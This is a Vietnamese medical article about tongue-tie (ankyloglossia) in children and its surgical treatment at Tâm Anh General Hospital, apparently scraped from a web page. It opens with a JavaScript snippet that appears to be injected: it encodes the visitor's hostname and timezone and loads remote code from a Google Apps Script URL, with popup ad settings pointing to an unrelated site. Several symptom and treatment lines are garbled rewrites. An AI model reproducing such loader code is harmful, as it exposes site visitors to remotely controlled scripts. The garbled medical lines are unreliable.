var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Bệnh viện đa khoa Tâm Anh

Bệnh viện Đa khoa Tâm Anh vừa thực hiện ca phẫu thuật cắt phanh lưỡi cho một bé trai 3 tuổi có dấu hiệu phát âm khó khăn do phát hiện trễ. Sau kiểm tra, BS.CKII Trần Thị Thúy Hằng – Trưởng khoa Tai Mũi Họng phát hiện bé dính thắng lưỡi nặng (mức độ 3). Qua ca phẫu thuật bằng Bipolar – dao mổ điện lưỡng cực với điện áp thấp, bé đã được cắt phanh lưỡi trong vòng 15 phút. Ca phẫu thuật không gây đau, không chảy máu và bé có thể ăn uống ngay sau mổ. Bệnh nhi được đưa đến khoa Tai Mũi Họng BVĐK Tâm Anh TP.HCM bởi bố mẹ với hy vọng chức năng nói của bé sẽ được cải thiện.

Dính thắng lưỡi là gì?

Dính thắng lưỡi là một dị tật bẩm sinh, xuất hiện ở trẻ từ khi mới sinh ra, do bị ngắn dây thắng lưỡi (một lớp màng mỏng dưới lưỡi) làm hạn chế cử động bình thường của lưỡi. Theo thống kê, có khoảng 5% trẻ sơ sinh gặp phải tật dính thắng lưỡi trẻ em và được phát hiện ngay trong tháng đầu sau sinh khi thăm khám sức khỏe định kỳ hoặc khi tiêm chủng. Tật dính thắng lưỡi có thể phát hiện muộn hơn khi cha mẹ thấy bé khó bú, khó phát âm hay chậm lên cân. Nếu bé bị dính thắng lưỡi phát hiện muộn sẽ làm ảnh hưởng đến chức năng bú nuốt và phát âm, đồng thời tác động lên sự phát triển thể chất và ngôn ngữ của trẻ.

Dính thắng lưỡi ở trẻ em có thể phát hiện ngay trong tháng đầu trẻ sinh ra.

Nguyên nhân dị tật dính thắng lưỡi trẻ em

Dị tật dính thắng lưỡi là một hiện tượng bẩm sinh không gây nguy hiểm nhưng có thể ảnh hưởng đến chức năng của lưỡi. Mặc dù đã có nhiều nghiên cứu, nhưng nguyên nhân dính thắng lưỡi vẫn chưa được các nhà khoa học tìm ra. Một số nghiên cứu cho thấy dính thắng lưỡi có yếu tố di truyền.

Dấu hiệu trẻ bị dính thắng lưỡi

Theo BS.CKII Trần Thị Thúy Hằng, Trưởng khoa Tai Mũi Họng, BVĐK Tâm Anh TP.HCM, để xác định sớm tình trạng trẻ bị tật dính thắng lưỡi, phụ huynh cần đưa trẻ tới bệnh viện để kiểm tra nếu có một số dấu hiệu điển hình sau đây:

 • Trẻ gặp vấn đề khi ti mẹ.
 • Chiến thắng của trẻ em ngắn gọn đáng ngạc nhiên.
 • Lưỡi của em bé không thể di chuyển sang hai phía.
 • Không thể đưa lưỡi lên để tiếp xúc với hàm trên.
 • Với trẻ nhỏ, khi bé khóc, đầu lưỡi thường mang hình dạng chữ V.
 • Lưỡi của trẻ không thể rút ra khỏi miệng dưới.
 • Dính thắng lưỡi khiến trẻ gặp khó khi bú, phát hiện trễ gây chậm nói.

  Chẩn đoán và phân loại mức độ dính thắng lưỡi ở trẻ em

  Dị tật dính thắng lưỡi có thể chẩn đoán bằng cách quan sát và đo chiều dài của dây thắng lưỡi. Các trường hợp bị dính thắng lưỡi được phân loại thành 4 mức độ khác nhau, dựa trên chiều dài từ nơi bám ở sàn miệng đến vị trí bám vào lưỡi.

 • Mức độ 1: Trẻ bị dính vào lưỡi nhẹ từ 12-16 mm.
 • Mức độ 2: Trẻ bị dính vào lưỡi trung bình từ 8-11 mm.
 • Mức độ 3: Trẻ bị dính thắng lưỡi nặng từ 3-7 milimét.
 • Mức độ 4: Trẻ bị dính thắng lưỡi hoàn toàn dưới 3 mm.
 • Bé trai L.H.M.Đ đã bị phát hiện có vấn đề về thắng lưỡi nặng từ khi 3 tuổi, gây ảnh hưởng đến khả năng nói. Cụ thể, bé gặp khó khăn trong việc nói và phát âm.

  Tật dính thắng lưỡi có ảnh hưởng thế nào với trẻ?

  Dù dính thắng lưỡi là một dị tật bẩm sinh không gây nguy hiểm, nhưng nếu không phát hiện sớm, nó có thể gây ra một số hậu quả sau này.

 • Ảnh hưởng về thể chất: Sự bất thường về hình dạng lưỡi có thể ảnh hưởng đến khả năng nuốt của trẻ. Khi trẻ lớn lên, việc ăn uống trở nên khó khăn do lưỡi không thể di chuyển một cách bình thường, dẫn đến sự thiếu hụt chất dinh dưỡng và trẻ phát triển chậm về cân nặng.
 • Khi trẻ bắt đầu học nói, ngôn ngữ có thể ảnh hưởng đến việc phát âm. Trẻ không chỉ gặp khó khăn trong việc nói, mà còn có thể nói ngọng và chậm nói.
 • Hàm răng có thể bị ảnh hưởng về mặt thẩm mỹ khi bị tình trạng dính thắng lưỡi, gây đẩy các răng ở cửa hàm dưới nghiêng và không đồng đều.
 • Điều trị dính thắng lưỡi như thế nào?

  BS.CKII Trần Thị Thúy Hằng cho biết, việc quyết định cắt thắng lưỡi (cắt phanh lưỡi) thường phụ thuộc vào mức độ dính và ảnh hưởng đến việc cử động lưỡi, phát âm và việc bú của trẻ. Nếu trẻ bị dính thắng lưỡi nhiều và ảnh hưởng đến việc bú, việc cắt thắng lưỡi cần được thực hiện ngay lập tức. Nếu trẻ bị dính thắng lưỡi và gây ảnh hưởng đến việc phát âm, việc cắt thắng lưỡi cần được thực hiện sớm trước khi trẻ phát triển ngôn ngữ. Bệnh nhi có dị tật dính thắng lưỡi thường được điều trị theo các bước sau:

 • Khi phát hiện trẻ em bị tật dính thắng lưỡi, cha mẹ nên đưa trẻ đến bệnh viện chuyên khoa để kiểm tra và đánh giá mức độ tật này.
 • Phẫu thuật dính thắng lưỡi cho trẻ: Trẻ sẽ được bác sĩ tiến hành phẫu thuật sau khi được gây tê hoặc gây mê. Bác sĩ sẽ sử dụng một công cụ đặc biệt gọi là dao bipolar để cắt thắng lưỡi. Thời gian thực hiện ca mổ dự kiến khoảng 15 phút và sau đó trẻ có thể được xuất viện trong cùng ngày. Sau mổ, trẻ có thể ăn uống trở lại sau 3 tiếng và thời gian hồi phục hoàn toàn dự kiến trong khoảng 1-2 tuần.
 • Chăm sóc trẻ sau phẫu thuật: Sau khi thực hiện phẫu thuật cắt dính thắng lưỡi, vết cắt thường sẽ xuất hiện một vùng màu trắng. Tuy nhiên, không cần quá lo lắng vì vết này sẽ tự lành sau 1-2 tuần. Bên cạnh việc tuân thủ hướng dẫn của bác sĩ, cần chăm sóc trẻ một cách cẩn thận, tránh cho trẻ cắn hoặc ngậm các vật cứng để tránh chảy máu, và không để trẻ sờ vào vị trí cắt để tránh nhiễm trùng. Ngoài ra, hàng ngày cần vệ sinh miệng cho trẻ sau khi ăn, và đảm bảo trẻ uống đủ nước để giữ miệng sạch.
 • Tìm hiểu phương pháp gắn kết thắng lưỡi ở trẻ an toàn, nhanh chóng và không đau.

  Cách phòng tránh dị tật dính thắng lưỡi cho trẻ

  Tật dính thắng lưỡi xuất hiện nhiều hơn ở bé trai so với bé gái, tỷ lệ là 3:1. Đây là một dạng dị tật bẩm sinh không thể tránh được, nhưng phụ huynh có thể phát hiện tật này ngay sau khi sinh bằng cách cho trẻ khám sức khỏe tổng quát hoặc khám sức khỏe định kỳ. Bác sĩ có thể phát hiện tật qua việc quan sát lưỡi. Tuy nhiên, cũng có nhiều trường hợp tật này được phát hiện muộn khi trẻ bú kém, phát âm khó khăn và phát triển chậm.

  Thắc mắc về dị tật dính thắng lưỡi

  1. Phẫu thuật dính thắng lưỡi ở đâu tốt?

  Rất đông phụ huynh đang lo lắng không biết nên đưa trẻ em đi khám, điều trị, hay phẫu thuật tật dính thắng lưỡi ở đâu là tốt nhất. Hiện tại, có rất nhiều cơ sở quảng cáo về điều trị tật dính dây thắng lưỡi. Mặc dù đây là một phẫu thuật nhỏ, nhưng cần phải đánh giá xem có cần can thiệp phẫu thuật hay không. Vì vậy, phụ huynh nên đưa trẻ đến các bệnh viện uy tín và có chất lượng để khám, điều trị.

  Khoa Tai Mũi Họng của Hệ thống BVĐK Tâm Anh đã thành công trong việc điều trị hàng trăm trường hợp dị tật dính thắng lưỡi ở trẻ nhỏ. Phương pháp được áp dụng tại đây là cắt thắng lưỡi bằng dao mổ bipolar, một phương pháp phẫu thuật hiện đại với những ưu điểm vượt trội.

 • Phẫu thuật được thực hiện nhanh chóng và tiết kiệm thời gian. Sau khi cắt thắng lưỡi, trẻ sẽ được cho bú ngay và xuất viện trong ngày.
 • Phẫu thuật không chảy máu hoặc rất ít chảy máu: do công cụ dao mổ bipolar vừa cắt vừa kiểm soát chảy máu tại chỗ.
 • Phẫu thuật không gặp vấn đề về nhiễm trùng hoặc nguy cơ nhiễm trùng rất thấp nhờ chức năng cầm máu tại chỗ tốt, không tạo điều kiện thuận lợi cho vi khuẩn gây nhiễm trùng.
 • Phẫu thuật nhanh chóng: khuyến khích phục hồi mô sinh học và lành vết thương.
 • Giảm tối đa khả năng tái phát, tái lập hoặc hình thành sẹo xơ.
 • Khoa Tai Mũi Họng, BVĐK Tâm Anh là nơi thực hiện phẫu thuật dính thắng lưỡi cho trẻ em.

  2. Cắt thắng lưỡi cho bé chi phí bao nhiêu?

  Chi phí phẫu thuật dính thắng lưỡi ở trẻ sẽ phụ thuộc vào phương pháp gây tê được bác sĩ lựa chọn, có thể là gây tê tại chỗ hoặc gây mê, và mức chi phí sẽ khác nhau. Điều này còn phụ thuộc vào độ tuổi của trẻ cần phẫu thuật và mức độ dính thắng lưỡi. Sau khi phẫu thuật, nếu trẻ ổn định, có thể về nhà ngay trong ngày mà không cần phải nằm viện, do đó không tốn nhiều chi phí.

  3. Dính thắng lưỡi nhẹ có tự hết không?

  Các trẻ sơ sinh bị dính thắng lưỡi ở mức độ 1 và 2 sẽ được bác sĩ thăm khám, đánh giá và tiếp tục theo dõi thêm. Thông thường, những trẻ bị dính thắng lưỡi nhẹ không gây ảnh hưởng đến hoạt động ăn uống, phát âm và có thể tự điều chỉnh tình trạng này. Tuy nhiên, nếu trẻ bị dính thắng lưỡi nhiều và ảnh hưởng đến việc bú, cần phải cắt sớm. Nếu việc dính thắng lưỡi gây ra ảnh hưởng cho việc phát âm, cần phải cắt trước khi trẻ phát triển ngôn ngữ.

  4. Khi nào thì không nên cắt thắng lưỡi ?

  Không nên thực hiện thủ thuật cắt dính thắng lưỡi trong trường hợp bé có rối loạn đông máu hoặc nhiễm trùng răng miệng, vì có thể gây chảy máu nhiều và nguy cơ nhiễm trùng vết mổ.

  5. Thời điểm cắt thắng lưỡi phù hợp ?

  Thời điểm tốt nhất để thực hiện phẫu thuật cắt thắng lưỡi cho trẻ nhỏ là từ 3-6 tháng vì:

 • Trẻ đủ sức khỏe để chịu đựng tốt để bác sĩ thực hiện ca phẫu thuật.
 • Không nên chậm trong việc cắt thắng lưỡi cho trẻ bị dính thắng lưỡi nặng, vì tật này có thể ảnh hưởng đến khả năng ăn uống, phát triển ngôn ngữ và vẻ đẹp của trẻ nếu để lâu.
 • 6. Phẫu thuật cắt dính thắng lưỡi ở trẻ có nguy hiểm không?

  Nhiều phụ huynh đang lo lắng về việc phẫu thuật cắt phanh lưỡi có nguy hiểm cho trẻ sơ sinh hay không. Thực tế, phẫu thuật này không gây nguy hiểm. Tuy nhiên, để đảm bảo an toàn và tránh nhiễm trùng, cha mẹ nên chọn các cơ sở uy tín như bệnh viện chuyên khoa Tai – Mũi – Họng. Bệnh viện Đa khoa Tâm Anh có cơ sở vật chất, máy móc và thiết bị y tế hiện đại, đảm bảo thực hiện phẫu thuật an toàn, nhanh chóng và hạn chế nhiễm trùng.